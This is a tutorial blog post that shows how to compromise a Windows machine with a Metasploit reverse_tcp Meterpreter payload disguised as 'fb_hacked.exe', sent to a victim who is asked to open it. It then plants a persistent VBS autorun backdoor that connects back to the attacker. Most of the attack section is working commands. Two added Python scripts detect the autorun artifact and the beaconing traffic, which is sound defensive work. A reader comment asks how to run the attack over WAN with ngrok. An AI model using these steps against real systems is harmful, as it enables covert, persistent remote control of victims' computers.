Hello guys, in this tutorial I will show you how to create a backdoor with Persistence using the Metasploit Framework. Before going into the tutorial, let me explain a little bit about Persistence. Metasploit contains two backdoor scripts: one is Persistence and the other is Metsvc. Here I am using Persistence to create a backdoor. Persistence creates a backdoor that tries to connect back to the attacker's Metasploit instance, and that connect-back happens at system boot or user logon. You can also configure the time between connect-back attempts, in case the attacker machine is not up at the moment and you want the backdoor to keep trying to connect to you. How does it work? Under the hood, Persistence creates a VBS script on the victim system and adds it to the appropriate registry key so that it autoruns. That is all about backdoors with Persistence; now let's check out how it works...

Step 1 :- Here I am using BackTrack 5 R3, which is the attacker system. Now we open a console and type the following command to create an exploit; here my exploit's name is fb_hacked.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST= R | msfencode -t exe -c 16 >fb_hacked.exe


Now the exploit, successfully encoded, is ready in the root directory.

Step 2 :- Now we enter the msfconsole; for that,

                Open a console and type msfconsole


Step 3 :- Then we set the payload using the following commands:

               use exploit/multi/handler

               set PAYLOAD windows/meterpreter/reverse_tcp

               (here PAYLOAD means the code that actually runs on the victim machine after exploitation; windows means the victim machine is Windows, meterpreter is used to open a Meterpreter session on that Windows machine, and reverse_tcp makes the victim machine connect back to the attacker machine)

               set LHOST (this is the BackTrack IP address, i.e. the attacker machine; use the ifconfig command to see the IP address of BackTrack)

               set LPORT 4444



Step 4 :- In the above screenshot we run the exploit and wait for the victim to click on it. Now we copy that exploit, send it to the victim and request him/her to open it.


Now when the victim clicks on the fb_hacked exploit, it runs on the victim machine with full permissions; here we have successfully exploited the victim machine and a Meterpreter session on it is open.


Now it's time to create a backdoor; for that we are going to run Persistence using the run command.


run persistence -A -L c:\\ -X -i 10 -p 443 -r

(here -A means automatically start a matching multi/handler to connect to the agent; -L is where to write the payload on the target, i.e. where the VB script is located, here in the c:\ drive; -X means the agent automatically starts when the system boots; -i 10 is the number of seconds to wait between each connect attempt; -p 443 is the port on which Metasploit will be listening; and -r is the IP on which the attacker machine is running, which



Now keep track of the yellow-marked file, i.e. /root/.msf4/logs/persistence/MUKESH-80BAA26A_20131020.5854/MUKESH-80BAA26A_20131020.5854.rc

which allows you to uninstall or delete this backdoor at a later time.

Now we can notice that it just connected back to give us a new Meterpreter session. If I send this Meterpreter session to the background using the background command and then run the sessions command, we actually find 2 or 3 Meterpreter sessions currently waiting for us.

And here session 3 is the new one, created by Persistence.


sessions -i 3



Now if you want to see what really happened on the victim machine, go to the C:\ drive of the victim machine. There you will notice that a Visual Basic script has been generated; this is what contains the persistent backdoor.
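As an added example (not part of this tutorial and not Metasploit's own code), here is how a defender can hunt for the artifact this step describes: a script dropped in the root of the C:\ drive and started by an autorun registry entry. The script parses a text dump in the style of `reg query` output of the standard HKLM and HKCU ...\CurrentVersion\Run keys and flags entries that launch a Windows Script Host interpreter or point at a script file, especially one stored directly in the root of a drive. The sample dump embedded below is constructed; entry names, paths and file names are made up for illustration.

```python
"""Hunt for script-based autorun persistence in a dump of the Run keys.

Added example for this tutorial; it is not Metasploit code. Input is a text
dump in the style of `reg query ...\CurrentVersion\Run` output. The sample
below is constructed: entry names, paths and file names are made up.
"""
import re
from typing import Dict, List

# Constructed sample of Run-key contents from both hives (not real data).
SAMPLE_RUN_EXPORT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    UpdateSvc         REG_SZ           wscript.exe //B //nologo C:\AbCdEfGh.vbs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive          REG_SZ           "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Loader            REG_SZ           cscript C:\Users\alice\AppData\Local\Temp\x.vbs
"""

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.+)$")
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")
SCRIPT_HOST_RE = re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)
SCRIPT_FILE_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)
# A script sitting directly in the root of a drive, e.g. C:\something.vbs.
DRIVE_ROOT_SCRIPT_RE = re.compile(r"\b[A-Za-z]:\\[^\\\s\"]+\.(vbs|vbe|js|jse|wsf)\b", re.I)


def parse_run_export(text: str) -> List[Dict[str, str]]:
    """Return one dict per registry value, tagged with the key it sits under."""
    entries: List[Dict[str, str]] = []
    current_key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current_key:
            name, reg_type, data = value_match.groups()
            entries.append({"key": current_key, "name": name, "type": reg_type, "data": data})
    return entries


def suspicious_reasons(command: str) -> List[str]:
    """Explain why an autorun command line deserves a look; empty list means clean."""
    reasons = []
    if SCRIPT_HOST_RE.search(command):
        reasons.append("launches a Windows Script Host interpreter (wscript/cscript)")
    if SCRIPT_FILE_RE.search(command):
        reasons.append("points at a script file")
    if DRIVE_ROOT_SCRIPT_RE.search(command):
        reasons.append("script is stored in the root of a drive")
    return reasons


def find_script_autoruns(text: str) -> List[Dict[str, object]]:
    """Parse a Run-key dump and return only the entries with at least one reason."""
    hits = []
    for entry in parse_run_export(text):
        reasons = suspicious_reasons(entry["data"])
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_script_autoruns(SAMPLE_RUN_EXPORT):
        print(f"{hit['key']}\\{hit['name']}: {hit['data']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

On a live system the same logic applies to the output of `reg query` for each Run key, or to the Logon tab of Sysinternals Autoruns; the point of the reasons list is that a Run entry invoking wscript or cscript on a .vbs file that lives in the root of a drive is rare for legitimate software and is exactly the shape of artifact this walkthrough leaves behind.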




Now go back to BackTrack and let's see what happens when the system reboots. Reboot the victim system using the reboot command, and wait for the victim system to restart.

Here we see that when the system restarts the previous session is closed, i.e. session 3, and after the restart the persistent backdoor connects back to us and opens a new session, i.e. session 4. Now we have a new Meterpreter session which we can comfortably connect to using the sessions command:

sessions -i 4
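Added example, not from the original tutorial: the -i 10 and -p 443 options in the persistence command above mean that whenever the handler is not listening, the agent retries the same destination and port every 10 seconds, and after a reboot it starts doing so again. That metronome-like retry loop is something a network defender can pick out of firewall or proxy logs. The script below groups outbound connection attempts by source, destination and port and flags groups whose inter-attempt gaps are nearly constant. The log format, the hostnames and every address in the sample are constructed for this example.

```python
"""Spot fixed-interval connect-back retries in outbound connection logs.

Added example for this tutorial, not tool output. The log format and every
address below are constructed; 10.0.0.5 is the (made-up) host retrying
203.0.113.7:443 every 10 seconds while nothing is listening there.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed firewall-style log: one outbound attempt per line.
SAMPLE_LOG = """\
2013-10-20T10:00:00 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:00:03 src=10.0.0.8 dst=198.51.100.2 dport=443 proto=tcp action=allow
2013-10-20T10:00:10 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:00:20 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:00:30 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:00:40 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:00:41 src=10.0.0.8 dst=198.51.100.2 dport=443 proto=tcp action=allow
2013-10-20T10:00:50 src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp action=deny
2013-10-20T10:02:15 src=10.0.0.8 dst=198.51.100.9 dport=443 proto=tcp action=allow
"""

Flow = Tuple[str, str, str]  # (src, dst, dport)


def parse_log(text: str) -> Dict[Flow, List[datetime]]:
    """Group connection timestamps by (src, dst, dport); unparsable lines are skipped."""
    flows: Dict[Flow, List[datetime]] = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        fields = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
        if not all(k in fields for k in ("src", "dst", "dport")):
            continue
        flows[(fields["src"], fields["dst"], fields["dport"])].append(ts)
    return flows


def find_beacons(text: str, min_attempts: int = 5, max_cv: float = 0.2) -> List[Dict[str, object]]:
    """Return flows with >= min_attempts whose inter-attempt gaps are nearly constant.

    max_cv is the allowed coefficient of variation (stdev / mean) of the gaps;
    a value near 0 means a fixed retry timer rather than human-driven traffic.
    """
    beacons = []
    for (src, dst, dport), stamps in parse_log(text).items():
        if len(stamps) < min_attempts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "attempts": len(stamps), "mean_interval": avg, "cv": cv})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(f"{b['src']} -> {b['dst']}:{b['dport']}: {b['attempts']} attempts, "
              f"every {b['mean_interval']:.1f}s (cv={b['cv']:.2f})")
```

The thresholds are deliberately parameters: a short interval such as the 10 seconds used here produces enough attempts within a minute to flag, while a longer interval needs a wider log window before min_attempts is reached. Port 443 on its own is not a signal, since most legitimate traffic uses it; the regularity of the gaps, combined with repeated denies to one destination, is what makes the flow stand out.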







  1. I want to know: if I perform this on WAN using ngrok, then in the persistence command, I mean in the Ruby script, what details will we enter in LHOST and LPORT, or our local IP address?
